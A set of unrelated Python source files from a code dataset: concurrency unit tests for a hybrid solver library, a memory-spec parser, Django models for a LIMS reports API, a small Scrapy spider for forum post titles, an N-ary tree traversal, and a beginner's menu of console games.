cpu_count\n\n\nclass TestPresent(unittest.TestCase):\n\n def test_res(self):\n for val in 1, 'x', True, False, State(problem=1), lambda: None:\n f = Present(result=val)\n self.assertIsInstance(f, Future)\n self.assertTrue(f.done())\n self.assertEqual(f.result(), val)\n\n def test_exc(self):\n for exc in ValueError, KeyError, ZeroDivisionError:\n f = Present(exception=exc())\n self.assertIsInstance(f, Future)\n self.assertTrue(f.done())\n self.assertRaises(exc, f.result)\n\n def test_invalid_init(self):\n self.assertRaises(ValueError, Present)\n\n\nclass TestImmediateExecutor(unittest.TestCase):\n\n def test_submit_res(self):\n ie = ImmediateExecutor()\n f = ie.submit(lambda x: not x, True)\n self.assertIsInstance(f, Present)\n self.assertIsInstance(f, Future)\n self.assertEqual(f.result(), False)\n\n def test_submit_exc(self):\n ie = ImmediateExecutor()\n f = ie.submit(lambda: 1/0)\n self.assertIsInstance(f, Present)\n self.assertIsInstance(f, Future)\n self.assertRaises(ZeroDivisionError, f.result)\n\n\nclass TestMultithreading(unittest.TestCase, RunTimeAssertionMixin):\n\n def test_concurrent_tabu_samples(self):\n t1 = hybrid.TabuProblemSampler(timeout=1000)\n t2 = hybrid.TabuProblemSampler(timeout=2000)\n workflow = hybrid.Parallel(t1, t2)\n\n bqm = dimod.BinaryQuadraticModel({'a': 1}, {}, 0, 'BINARY')\n state = hybrid.State.from_problem(bqm)\n\n with self.assertRuntimeWithin(1900, 2500):\n workflow.run(state).result()\n\n @unittest.skipUnless(cpu_count() >= 2, \"at least two threads required\")\n def test_concurrent_sa_samples(self):\n s1 = hybrid.SimulatedAnnealingProblemSampler(num_reads=1000, num_sweeps=10000)\n s2 = hybrid.SimulatedAnnealingProblemSampler(num_reads=1000, num_sweeps=10000)\n p = hybrid.Parallel(s1, s2)\n\n bqm = dimod.BinaryQuadraticModel({'a': 1}, {}, 0, 'BINARY')\n state = hybrid.State.from_problem(bqm)\n\n def time_runnable(runnable, init):\n runnable.run(init).result()\n return sum(runnable.timers['dispatch.next'])\n\n t_s1 = time_runnable(s1, state)\n t_s2 = time_runnable(s2, state)\n t_p = time_runnable(p, state)\n\n # parallel execution must not be slower than the longest running branch + 75%\n # NOTE: the extremely weak upper bound was chosen so we don't fail on the\n # unreliable/inconsistent CI VMs, and yet to show some concurrency does exist\n t_expected_max = max(t_s1, t_s2) * 1.75\n\n self.assertLess(t_p, t_expected_max)\n","sub_path":"tests/test_concurrency.py","file_name":"test_concurrency.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"46493424","text":"try:\n\tfrom inits.inits import Inits\nexcept:\n\tfrom inits import Inits\n\n\n\nclass MemData(object):\n\t\"\"\"docstring for MemData\"\"\"\n\t\n\ts=Inits()\n\n\t# convers MB to GB\n\tdef MB_to_GB(self, uInput):\n\t\tgb = 1.0/1024\n\t\tcv = gb * uInput\n\t\treturn \"%.1f\" % cv\n\n\t# returns memory type\n\tdef type(self):\n\t\t\tdata=self.s.find_data(\"memory.txt\", \"Type: DDR\")\n\t\t\ttry:\n\t\t\t\tdata=data.replace('FB-DIMM', '').replace(' ', '')\n\t\t\texcept:\n\t\t\t\tpass\n\n\t\t\tif data:\n\t\t\t\tif data == \"2\":\n\t\t\t\t\treturn \"DDR2\"\n\t\t\t\telif data == \"3\":\n\t\t\t\t\treturn \"DDR3\"\n\n\t\t\tdata=self.s.find_data(\"memory.txt\", \"Type: DD\")\n\t\t\tif 'R' in data:\n\t\t\t\treturn \"DDR2\" \n\n\t\t\treturn \"DATA NOT AVAILABLE\"\n\n\n\t# returns memory speed\n\tdef speed(self):\n\t\tdata=self.s.find_data(\"memory.txt\", \"MHz\", 1)\n\n\t\ttyp=self.s.find_data(\"memory.txt\", \"Type: DDR\")\n\t\ttry:\n\t\t\ttyp=typ.replace('FB-DIMM', '').replace(' ', '')\n\t\texcept:\n\t\t\tpass\n\n\t\tdef spd(speed, data):\n\t\t\tfor key, value in speed.items():\n\t\t\t\tif int(data[1]) == value:\n\t\t\t\t\tklen=len(key.split(\"-\"))\n\t\t\t\t\tif klen > 2:\n\t\t\t\t\t\tk=key.split(\"-\")[0:2]\n\t\t\t\t\t\treturn str(\"-\".join(k))\n\t\t\t\t\treturn(key)\n\n\n\t\tspeed_2={ 'PC2-3200' : 400, 'PC2-4200' : 533, 'PC2-5300' : 667, \n\t\t\t\t 'PC2-6400' : 800, 'PC2-8500' : 1066 }\t\t\t\t\t\n\n\t\tspeed_3={ 'PC3-6400' : 800, 'PC3-8500-1' : 1066, 'PC3-8500-2' : 1067,\n\t\t\t 'PC3-10600-1' : 1333, 'PC3-10600-2' : 1334, 'PC3-12800' : 1600, \n\t\t\t 'PC3-14900' : 1866, 'PC3-17000' : 2133, 'PC3-5300' : 667}\n\n\t\tif (typ == \"2\") or (self.s.find_data(\"memory.txt\", \"Type: DD\")==\"R\"):\n\t\t\t\n\t\t\ttry:\n\t\t\t\ts=spd(speed_2, data)\n\t\t\t\tif s:\n\t\t\t\t\treturn s\n\t\t\t\telse:\n\t\t\t\t\treturn \"DATA UNAVAILABLE\"\n\t\t\texcept:\n\t\t\t\treturn \"DATA UNAVAILABLE\"\n\n\n\t\tif typ == \"3\":\n\t\t\ts=spd(speed_3, data)\n\t\t\tif s:\n\t\t\t\treturn s\n\t\t\telse:\n\t\t\t\treturn \"DATA UNAVAILABLE\"\n\t\t\t\t\n\t\ts=spd(speed_3, data)\n\t\treturn s\n\n\n\t# meme size\n\tdef mem_size(self):\n\t\tsize_arr=[]\n\t\twith open(self.s.master_data_dir(1)+\"memory.txt\") as memSize:\n\t\t\tfor size in memSize:\n\t\t\t\tif (\"Size:\" in size) and (\"No Module Installed\" not in size) and (\"(Single-bank Connection)\" not in size) and (\"Maximum Memory Module\" not in size) and (\"Installed Size: Not Installed\" not in size) and (\"Maximum Total Memory Size:\" not in size) and (\"Enabled Size: Not Installed\" not in size) and (\"(Double-bank Connection)\" not in size) and (\"kB\" not in size):\n\t\t\t\t\tsize_arr.append(size.replace('Size: ', '').replace('\\t', '').replace('\\n', '').replace(' MB', ''))\n\n\t\t# return size_arr\n\n\t\tcount=0\n\t\ttotal=0\n\t\twhile count < len(size_arr):\n\t\t\tcount=count +1\n\t\t\ttotal=int(size_arr[count - 1])+total\n\n\n\t\treturn str(self.MB_to_GB(total)+\" GB\")\n\n\n\n\nm=MemData()\n# print(m.type())\n# print(m.speed())\nprint(m.mem_size())","sub_path":"inits/mem_data.py","file_name":"mem_data.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"573832401","text":"from __future__ import unicode_literals\n\nfrom _collections import defaultdict\nfrom collections import OrderedDict\nimport json\nimport logging\n\nfrom aldjemy.core import get_engine\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.cache import cache\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db import models\nfrom django.db import transaction\nfrom django.utils import timezone\nfrom django.utils.encoding import smart_bytes\nimport six\n\nfrom reports import strftime_log\nimport reports.schema as SCHEMA\nfrom reports.serialize import LimsJSONEncoder\n\n\nAPI_ACTION = SCHEMA.VOCAB.apilog.api_action\n\nlogger = logging.getLogger(__name__)\n\ndef dict_strip_unicode_keys(uni_dict):\n \"\"\"\n Convert a dict of unicode keys into a dict of ascii keys.\n\n Useful for converting a dict to a kwarg-able format.\n \n # see tastypie.dict_strip_unicode_keys for original implementation.\n \"\"\"\n if six.PY3:\n return uni_dict\n\n data = {}\n\n for key, value in uni_dict.items():\n data[smart_bytes(key)] = value\n\n return data\n\n\nclass LogDiff(models.Model):\n \n # reference to the parent ApiLog\n log = models.ForeignKey('ApiLog', on_delete=models.CASCADE)\n \n #field = models.ForeignKey('Metahash')\n field_key = models.TextField()\n field_scope = models.TextField()\n \n before = models.TextField(null=True)\n after = models.TextField(null=True)\n \n class Meta:\n unique_together = (('log','field_key','field_scope')) \n\n def __repr__(self):\n return (\n \"\" \n % (self.log.ref_resource_name, self.log.key, self.field_key))\n\nclass ApiLog(models.Model):\n \n objects = models.Manager()\n \n # FIXME: change to foreign key\n user_id = models.IntegerField(null=False)\n username = models.CharField(null=False, max_length=128)\n\n # Name of the resource, i.e. \"apilog\" or \"screen\", \"user\", etc.\n ref_resource_name = models.CharField(\n null=False, max_length=128, db_index=True)\n\n # Full public key of the resource instance being logged (may be composite, \n # separated by '/')\n key = models.CharField(null=False, max_length=128, db_index=True)\n \n # Full uri of the resource instance being logged, \n # a combination of [base api uri]/[resource_name]/[key]\n uri = models.TextField(null=False)\n \n # Date and time of the update; this is the key for the apilog record\n date_time = models.DateTimeField(null=False)\n \n api_action = models.CharField(\n max_length=10, null=False, \n choices=zip(\n API_ACTION.get_ordered_dict().keys(),\n API_ACTION.get_ordered_dict().values(),\n )\n )\n \n comment = models.TextField(null=True)\n \n parent_log = models.ForeignKey(\n 'self', related_name='child_logs', null=True, on_delete=models.CASCADE)\n \n # json_field stores meta information\n json_field = models.TextField(null=True)\n \n is_preview = models.BooleanField(default=False)\n \n class Meta:\n unique_together = (('ref_resource_name', 'key', 'date_time')) \n\n def __init__(self, *args, **kwargs):\n self.diffs = {}\n models.Model.__init__(self, *args, **kwargs)\n \n def __repr__(self):\n return (\n ''\n % (self.id, self.api_action, self.ref_resource_name, self.key,\n self.uri, strftime_log(self.date_time), self.user_id, \n self.username))\n\n @property\n def log_uri(self):\n ''' Return the URI of the ApiLog\n '''\n \n return '/'.join([\n self.ref_resource_name,self.key, strftime_log(self.date_time)])\n \n @staticmethod \n def json_dumps(obj):\n \n obj_as_dict = { k:v for k,v in vars(obj).items() if k[0] != '_'}\n diffs = defaultdict(list)\n for dl in obj.logdiff_set.all():\n diffs[dl.field_key] = [dl.before,dl.after]\n obj_as_dict['diffs'] = dict(diffs)\n return json.dumps(obj_as_dict, cls=LimsJSONEncoder)\n \n @staticmethod\n def _encode_before_after(val):\n '''\n Encode LogDiff.before and after values:\n All diff values are stored as strings unless they represent list values:\n - in this case the JSON representation of the list is stored. \n '''\n if val is None:\n return val\n if isinstance(val, (list,tuple)):\n val = json.dumps(val, cls=LimsJSONEncoder)\n elif not isinstance(val, six.string_types):\n val = str(val)\n return val\n \n def save(self, **kwargs):\n ''' \n Override to store/encode the diffs:\n - before/after are stored as the string representation of the field \n value.\n - if the field value is a list, store the JSON representation.\n '''\n \n is_new = self.pk is None\n \n logger.debug('encode json field: log: %r', self.json_field)\n if self.json_field:\n if isinstance(self.json_field, dict):\n try:\n self.json_field = json.dumps(self.json_field, cls=LimsJSONEncoder)\n except:\n logger.exception('error with json_field value encoding: %r - %r', \n e, json_field)\n models.Model.save(self, **kwargs)\n \n if is_new:\n logger.debug('logging new diffs: %r', self.diffs)\n bulk_create_diffs = []\n for key,diffs in self.diffs.items():\n assert isinstance(diffs, (list,tuple))\n assert len(diffs) == 2\n before = self._encode_before_after(diffs[0])\n after = self._encode_before_after(diffs[1])\n bulk_create_diffs.append(LogDiff(\n log=self,\n field_key = key,\n field_scope = 'fields.%s' % self.ref_resource_name,\n before=before,\n after=after))\n LogDiff.objects.bulk_create(bulk_create_diffs)\n else:\n logger.debug('logging update diffs: %r', self.diffs)\n # Note: this option should not be used for bulk creation\n for key,diffs in self.diffs.items():\n assert isinstance(diffs, (list,tuple))\n assert len(diffs) == 2\n before = self._encode_before_after(diffs[0])\n after = self._encode_before_after(diffs[1])\n found = False\n for logdiff in self.logdiff_set.all():\n if logdiff.field_key == key:\n logdiff.before=before\n logdiff.after=after\n logdiff.save()\n found = True\n if not found:\n LogDiff.objects.create(\n log=self,\n field_key = key,\n field_scope = 'fields.%s' % self.ref_resource_name,\n before=before,\n after=after)\n \n @staticmethod\n def bulk_create(logs):\n '''\n Utility method - bulk create/save ApiLog instances\n '''\n\n logger.debug('bulk create logs: %r', logs)\n with transaction.atomic():\n with get_engine().connect() as conn:\n last_id = int(\n conn.execute(\n 'select last_value from reports_apilog_id_seq;')\n .scalar() or 0)\n \n for log in logs:\n if log.json_field:\n if isinstance(log.json_field, dict):\n try:\n log.json_field = json.dumps(log.json_field, cls=LimsJSONEncoder)\n except:\n logger.exception('error with json_field value encoding: %r - %r', \n e, log.json_field)\n \n ApiLog.objects.bulk_create(logs)\n #NOTE: Before postgresql & django 1.10 only: \n # ids must be manually created on bulk create\n for i,log in enumerate(logs):\n log.id = last_id+i+1\n \n bulk_create_diffs = []\n for i,log in enumerate(logs):\n for key, logdiffs in log.diffs.items():\n bulk_create_diffs.append(\n LogDiff(\n log=log,\n field_key = key,\n field_scope = 'fields.%s' % log.ref_resource_name,\n before=ApiLog._encode_before_after(logdiffs[0]),\n after=ApiLog._encode_before_after(logdiffs[1]))\n )\n LogDiff.objects.bulk_create(bulk_create_diffs)\n \n return logs\n\n\nclass MetaManager(models.Manager):\n ''' Manager for the MetaHash table '''\n\n def __init__(self, **kwargs):\n super(MetaManager,self).__init__(**kwargs)\n\n def get_or_none(self, function=None, **kwargs):\n try:\n x = self.get(**kwargs)\n if x and function:\n return function(x)\n else:\n return x\n except self.model.DoesNotExist: \n return None\n\n def get_and_parse(self, scope='', field_definition_scope='fields.field', \n clear=False):\n '''\n Parse fields from the Metadata store using definitions specified by the\n \"field_definition_scope\" (cached version).\n\n @param scope defines the target resource to return fields for:\n e.g. \"fields.screensaveruser\", or \"fields.screen\"\n \n @param field_definition_scope defines the schema of the field objects \n that will be parsed:\n e.g. \"fields.field\", or \"fields.resource, or fields.vocabulary\"\n @param clear to clear the cache\n\n '''\n metahash = {}\n if not clear:\n metahash = cache.get('metahash:%s'%scope)\n else:\n cache.delete('metahash:%s'%scope)\n \n if not metahash:\n metahash = self._get_and_parse(\n scope=scope, field_definition_scope=field_definition_scope)\n cache.set('metahash:'+scope, metahash);\n logger.debug(\n 'get_and_parse done, for %r, hash found: %r', \n scope, metahash.keys())\n else:\n logger.debug('retrieve the cached field definitions for %r',scope)\n return metahash\n\n\n def _get_and_parse(self, scope='', \n field_definition_scope='fields.field'):\n '''\n Parse fields from the Metadata store using definitions specified by the\n \"field_definition_scope\" (non-cached version).\n '''\n logger.debug(\n 'get_and_parse table field definitions for scope: %r, fds: %r',\n scope, field_definition_scope)\n \n # Parse field schema definition first\n field_definition_table = MetaHash.objects.all().filter(\n scope=field_definition_scope)\n if not field_definition_table:\n # Bootstrap case\n logger.warn('field definitions not found for: %r',\n field_definition_scope)\n return {}\n logger.debug('field_definition_table: %r', \n [field.key for field in field_definition_table])\n \n # Use the field schema definition to parse the row objects:\n # Row objects themselves are stored in the metahash table as well.\n unparsed_objects = \\\n MetaHash.objects.all().filter(scope=scope).order_by('ordinal')\n logger.debug('unparsed_objects: %r', \n [field.key for field in unparsed_objects])\n \n parsed_objects = OrderedDict()\n for unparsed_object in unparsed_objects:\n\n parsed_object = {}\n \n for field_key in [x.key for x in field_definition_table]:\n parsed_object[field_key] = unparsed_object.get_field(field_key)\n \n # NOTE: choices for the \"vocabulary_scope_ref\" are being stored \n # here for convenience\n # TODO: restrict choices to retired != True\n if parsed_object.get(u'vocabulary_scope_ref'):\n vocab_ref = parsed_object['vocabulary_scope_ref']\n parsed_object['choices'] = [\n x.key for x in Vocabulary.objects.all().filter(\n scope=vocab_ref)]\n \n parsed_objects[unparsed_object.key] = \\\n dict_strip_unicode_keys(parsed_object)\n\n return parsed_objects\n\n\nclass MetaHash(models.Model):\n '''\n Store API metadata for resources and fields.\n \n Uses a composite key consisting of (scope, key).\n\n Additional data are defined as JSON in the json_field and are parsed \n using the schema defined via the \"field\" resource.\n '''\n \n objects = MetaManager()\n \n scope = models.CharField(max_length=64)\n key = models.CharField(max_length=64)\n alias = models.CharField(max_length=64)\n ordinal = models.IntegerField();\n\n # Required if the record represents a JSON field; \n # choices are from the TastyPie field types\n json_field_type = models.CharField(max_length=128, null=True); \n \n json_field = models.TextField(null=True) \n\n # Required if the record represents a linked field; \n # choices are from the TastyPie field types.\n # 20181214 - deprecate, used for Reagent resource subtypes.\n linked_field_type = models.CharField(\n max_length=128, null=True); \n \n loaded_field = None\n \n class Meta:\n unique_together = (('scope', 'key')) \n \n def get_json_field_hash(self):\n ''' Load the json field.'''\n if self.json_field:\n if not self.loaded_field: \n self.loaded_field = json.loads(self.json_field)\n return self.loaded_field\n else:\n return {}\n \n def get_field(self, field):\n '''Retrieve a field value, parsing it from the json_field if needed.'''\n field_names = set([\n f.name for f in self._meta.get_fields()])\n if field in field_names:\n return getattr(self,field)\n temp = self.get_json_field_hash()\n if field in temp:\n return temp[field]\n else:\n logger.debug('unknown field: %s',field)\n return None\n \n def set_json_field(self, field, value):\n '''Set a value to a field, stored internally in the json_field.'''\n \n temp = self.get_json_field_hash()\n temp[field] = value;\n self.json_field = json.dumps(temp, cls=LimsJSONEncoder)\n \n def is_json(self):\n '''True if the current metadata represents a JSON nested field'''\n return True if self.json_field_type else False\n \n def model_to_dict(self, scope):\n '''\n Specialized model_to_dict that will parse data from the internal\n json_field.\n \n @param scope for finding field definitions in the metahash table.\n e.g. \"fields.\" \n '''\n fields = MetaHash.objects.get_and_parse(scope=scope)\n dict = {}\n for key in fields.keys():\n dict[key] = self.get_field(key)\n return dict\n \n def __repr__(self):\n return (\n ''\n % (self.id, self.scope, self.key))\n\nclass Vocabulary(models.Model):\n '''Store vocabularies for the API'''\n \n objects = MetaManager()\n \n scope = models.CharField(max_length=128)\n key = models.CharField(max_length=128)\n alias = models.CharField(max_length=64)\n ordinal = models.IntegerField();\n title = models.CharField(max_length=512)\n is_retired = models.NullBooleanField()\n comment = models.TextField(null=True)\n description = models.TextField(null=True)\n \n # Other data may be stored in the json_field; field metadata for \n # the vocabulary resource may be used to define these fields.\n json_field = models.TextField(null=True)\n \n class Meta:\n unique_together = (('scope', 'key')) \n \n def get_json_field_hash(self):\n if self.json_field:\n return json.loads(self.json_field)\n else:\n return {}\n \n def get_field(self, field):\n temp = self.get_json_field_hash()\n if(field in temp):\n return temp[field]\n else:\n # Note, json_field is sparse, not padded with empty attributes\n logger.debug('%r, field not found: %r',self, field) \n return None\n \n def set_json_field(self, field, value):\n temp = self.get_json_field_hash()\n temp[field] = value;\n self.json_field = json.dumps(temp, cls=LimsJSONEncoder)\n \n def __repr__(self):\n return (\n ''\n % (self.scope, self.key, self.ordinal))\n\n \nclass Permission(models.Model):\n '''\n Permissions for API resources and fields:\n\n - scope of the resource or field,\n - key of the resource or field,\n - type, e.g. \"read\" or \"write\".\n '''\n\n scope = models.CharField(max_length=64) # scope of the permission\n key = models.CharField(max_length=64) # key of the permission\n type = models.CharField(max_length=35)\n \n class Meta:\n unique_together = (('scope', 'key', 'type')) \n \n def __repr__(self):\n return (\n ''\n % (self.scope, self.key, self.type))\n \n \nclass UserGroup(models.Model):\n '''\n Define UserGroups that will have permissions:\n - UserGroups contain users,\n - UserGroups may belong to other UserGroups through the super_groups,\n - A UserGroup inherits the super_group permissions,\n - A super_group inherits the UserGroup's users.\n '''\n \n name = models.TextField(unique=True)\n title = models.TextField(unique=True, null=True)\n users = models.ManyToManyField('reports.UserProfile')\n permissions = models.ManyToManyField('reports.Permission')\n description = models.TextField(null=True)\n \n # Super Groups: \n # - inherit permissions from super_groups, this group is a sub_group to them\n # - inherit users from sub_groups, this group is a super_group to them\n # NOTE: Creates an \"adjacency-tree\" here; this can be non-performant\n # for large trees - which is not expected here; and it also requires use\n # of postgres-specific \"array\" types and operators \n # (see reports.api.UserGroupResource).\n # The trade-off here is in simplicity of maintenance.\n # see \"SQL antipatterns\" for more discussion.\n super_groups = models.ManyToManyField('self', symmetrical=False, \n related_name='sub_groups')\n\n def get_all_permissions(self, sub_groups=None, **kwargs):\n ''' \n get permissions of this group, and any inherited through super_groups\n @param kwargs to filter permissions by attributes\n '''\n if not sub_groups: \n sub_groups = set()\n sub_groups.add(self) # TODO: test recursion check\n # start with this groups permissions\n permissions = set(self.permissions.filter(**kwargs));\n \n for group in self.super_groups.all():\n if group not in sub_groups:\n permissions.update(group.get_all_permissions(\n sub_groups=sub_groups, **kwargs))\n \n return list(permissions)\n \n def get_all_users(self, super_groups=None, **kwargs):\n '''\n get users of this group, and any from sub_groups as well\n @param kwargs to filter users by attributes\n '''\n if not super_groups:\n super_groups = set()\n super_groups.add(self)\n # start with this groups users\n users = set(self.users.filter(**kwargs));\n \n for group in self.sub_groups.all():\n if group not in super_groups:\n users.update(group.get_all_users(\n super_groups=super_groups, **kwargs))\n \n return list(users)\n \n def __repr__(self):\n return (\n ''\n % (self.name))\n\nclass UserProfile(models.Model):\n ''' Extend the Django auth.User for the reports API.'''\n\n objects = MetaManager()\n \n # Link to django.contrib.auth.models.User, note: allow null so that it\n # can be created at the same time, but not null in practice\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL, null=True, on_delete=models.CASCADE) \n \n # Note: username mirrors the auth_user.username field\n username = models.TextField(null=False, unique=True) \n \n # Reports API specific fields\n phone = models.TextField(null=True)\n mailing_address = models.TextField(null=True)\n comments = models.TextField(null=True)\n\n ecommons_id = models.TextField(null=True)\n\n # Note: fields also found on ScreensaverUser\n harvard_id = models.TextField(null=True)\n harvard_id_expiration_date = models.DateField(null=True)\n harvard_id_requested_expiration_date = models.DateField(null=True)\n \n created_by_username = models.TextField(null=True)\n\n gender = models.CharField(null=True, max_length=15) \n\n # These permissions assigned directly to the user, as opposed to by group\n permissions = models.ManyToManyField('reports.Permission')\n\n def __repr__(self):\n return (\n ''\n % (self.username, self.id, self.user.id))\n \n def get_all_groups(self):\n\n groups = set()\n for group in self.usergroup_set.all():\n groups.add(group)\n for supergroup in group.super_groups.all():\n if supergroup in groups:\n continue\n groups.add(supergroup)\n \n return groups\n \n @property\n def email(self):\n return self.user.email \n \n @property \n def first_name(self):\n \"Returns the person's full name.\"\n return self.user.first_name\n @property\n def last_name(self):\n \"Returns the person's full name.\"\n return self.user.last_name\n \n\nclass Job(models.Model):\n '''Manage API background job data'''\n\n user_requesting = models.ForeignKey(\n 'UserProfile', on_delete=models.PROTECT)\n \n # Unique URI for the resource action being serviced\n uri = models.TextField()\n method = models.TextField()\n encoding = models.TextField()\n content_type = models.TextField()\n http_accept = models.TextField()\n # JSON encoded request params\n params = models.TextField()\n \n # user comment on post\n comment = models.TextField(null=True);\n # Extra posted context data (filenames, etc.); JSON encoded\n context_data = models.TextField(null=True)\n \n # Assigned when the job is running\n process_id = models.TextField(null=True)\n # Extra runtime information, json encoded\n process_env = models.TextField(null=True)\n process_messages = models.TextField(null=True)\n \n state = models.TextField(\n default=SCHEMA.VOCAB.job.state.PENDING, \n choices=zip(\n SCHEMA.VOCAB.job.state.get_ordered_dict().keys(),\n SCHEMA.VOCAB.job.state.get_ordered_dict().values(),\n ))\n date_time_requested = models.DateTimeField(null=False, default=timezone.now) \n date_time_submitted = models.DateTimeField(null=True) \n date_time_processing = models.DateTimeField(null=True) \n date_time_completed = models.DateTimeField(null=True) \n \n response_status_code = models.IntegerField(null=True)\n #JSON encoded response content\n response_content = models.TextField(null=True)\n \n def __repr__(self):\n return (\n ''\n % (self.id, self.user_requesting.id))\n \n","sub_path":"reports/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":24525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"640330914","text":"import scrapy\n\nclass ScrapingSpider(scrapy.Spider):\n name = 'subject'\n start_urls = [\n 'https://gall.dcinside.com/mgallery/board/lists/?id=entj'\n ]\n\n def parse(self, response):\n for a in response.css('tr.ub-content'):\n href = a.css('a.reply_numbox::attr(href)').extract_first()\n text = a.css('a::text').extract_first()\n href2 = response.urljoin(href)\n yield{\n 'text': text,\n 'url': href2\n }\n# testing successful!\n# this file extracts 게시물 제목 and URL\n# based on quotes_spider.py\n","sub_path":"wiki/wiki/spiders/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"337866912","text":"from collections import deque\nclass Node(object):\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = []\nclass Solution(object):\n def levelOrder(self, root):\n \"\"\"\n :type root: Node\n :rtype: List[List[int]]\n \"\"\"\n if root is None:\n return []\n result = []\n queue =deque([root])\n while queue:\n level = []\n for _ in range(len(queue)):\n root = queue.popleft()\n level.append(root.val)\n queue.extend(root.children)\n result.append(level)\n return result\nn6=Node(6)\nn5=Node(5)\nn4=Node(4)\nn3=Node(2)\nn2=Node(3)\nn1=Node(1)\nn1.children=[n2,n3,n4]\nn2.children=[n5,n6]\ns=Solution()\nresult=s.levelOrder(n1)\nprint(result)","sub_path":"Week2/N叉树的层序遍历.py","file_name":"N叉树的层序遍历.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"70253559","text":"while True:\r\n\r\n print('Your options are divisors, even or odd, \\\r\nrock paper scissors, betting game, reverse word order, \\\r\npalindrome, even numbers, guessing game\\\r\n, even numbers, list end, fibonnaci, list duplicates, \\\r\npassword, cow and bull, list overlap and probably others')\r\n what = input('Which program do you want to run?: ')\r\n if what == 'divisors':\r\n x = int(input('Enter a number: '))\r\n y = list(range(1,x+1))\r\n z = []\r\n for i in y:\r\n y = x % i\r\n if y == 0:\r\n z.append(i)\r\n print(z)\r\n elif what == 'even or odd':\r\n run = 1\r\n while run == 1:\r\n number = input('Please enter a number: ')\r\n while number != 'end':\r\n number = int(number)\r\n number = number % 2\r\n if number == 1:\r\n print('You entered an odd number, try to fool me again')\r\n break\r\n if number == 0:\r\n print('Too easy, that was an even number')\r\n break\r\n if number == 'end':\r\n print('Ending program')\r\n run = run + 1\r\n elif what == 'rock paper scissors':\r\n points=0\r\n\r\n import random\r\n\r\n print('You will start with 0 points.')\r\n\r\n print('You will fight the computer by way of rock, paper, scissors.')\r\n\r\n print('The first of you to reach 2 points shall be awarded with continuing life. Good luck.')\r\n\r\n print('The score goes up when you win and down when you lose. Do not fail')\r\n\r\n print('The computer will attempt to reach -2 while you will try to get to 2')\r\n\r\n x = ['rock','paper','scissors']\r\n\r\n while -2 < points < 2:\r\n print('Player, what is your weapon of choice?')\r\n answer=input('rock, paper, or scissors: ')\r\n print()\r\n random.choice(x)\r\n computer = random.choice(x)\r\n\r\n if answer == 'rock':\r\n\r\n if computer == 'scissors':\r\n print('Computer used scissors')\r\n print('Wow, great job. Were so proud of you.')\r\n points=points+1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'rock':\r\n print('Computer used rock')\r\n print('Wow, good job, you tied. Hesitant applause.')\r\n points=str(points)\r\n print('The score is still',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'paper':\r\n print('Computer used paper')\r\n print('Wow, you lost. Try harder.')\r\n points=points-1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif answer == 'paper':\r\n\r\n if computer == 'scissors':\r\n print('Computer used scissors')\r\n print('Wow, you lost. Try harder.')\r\n points=points-1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'rock':\r\n print('Computer used rock')\r\n print('Wow, great job. Were so proud of you.')\r\n points=points+1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'paper':\r\n print('Computer used paper')\r\n print('Wow, good job, you tied. Hesitant applause.')\r\n points=str(points)\r\n print('The score is still',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif answer == 'scissors':\r\n\r\n if computer == 'scissors':\r\n print('Computer used scissors')\r\n print('Wow, good job, you tied.')\r\n points=str(points)\r\n print('The score is still',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'rock':\r\n print('Computer used rock')\r\n print('Wow, you lost. Try harder.')\r\n points=points-1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n elif computer == 'paper':\r\n print('Computer used paper')\r\n print('Wow, great job. Were so proud of you.')\r\n points=points+1\r\n points=str(points)\r\n print('The score is now',''+points+'')\r\n points=int(points)\r\n print()\r\n\r\n if points >= 2:\r\n\r\n print('Congratulations, you won against a computer. Feeling particularly proud?')\r\n\r\n elif points <= -2:\r\n\r\n print('Wow, you just got beaten by rng. Well done!')\r\n\r\n elif what == 'betting game':\r\n import random\r\n print('Your balance is 1000')\r\n\r\n balance = 1000\r\n\r\n while 0 < balance < 5000:\r\n print('How much do you wish to bet?')\r\n bet = input()\r\n bet = int(bet)\r\n number = random.randint(1,2)\r\n if bet > balance:\r\n print('Stupid human, you dont have that much money')\r\n print('Try again')\r\n\r\n if bet <= balance:\r\n bet = str(bet)\r\n print('We will flip a coin to determine the outcome.','Your bet is '+bet+'')\r\n\r\n print('The coin has landed')\r\n print('What is your guess')\r\n guess = input()\r\n guess = int(guess)\r\n\r\n print(number)\r\n\r\n\r\n if guess < number:\r\n print('You guessed too low. You lose '+bet+'')\r\n\r\n balance = int(balance)\r\n bet = int(bet)\r\n balance = balance-bet\r\n\r\n if guess > number:\r\n print('You guessed too high. You lose '+bet+'')\r\n\r\n balance = int(balance)\r\n bet = int(bet)\r\n balance = balance-bet\r\n\r\n if guess == number:\r\n print('Well Done!')\r\n\r\n balance = int(balance)\r\n bet = int(bet)\r\n balance = balance+3*bet\r\n\r\n balance = str(balance)\r\n bet = str(bet)\r\n print('Your new balance is '+balance+'')\r\n\r\n balance = int(balance)\r\n if balance >= 5000:\r\n print('Good job. You have acquired the skill-gambling addiction-.')\r\n\r\n\r\n 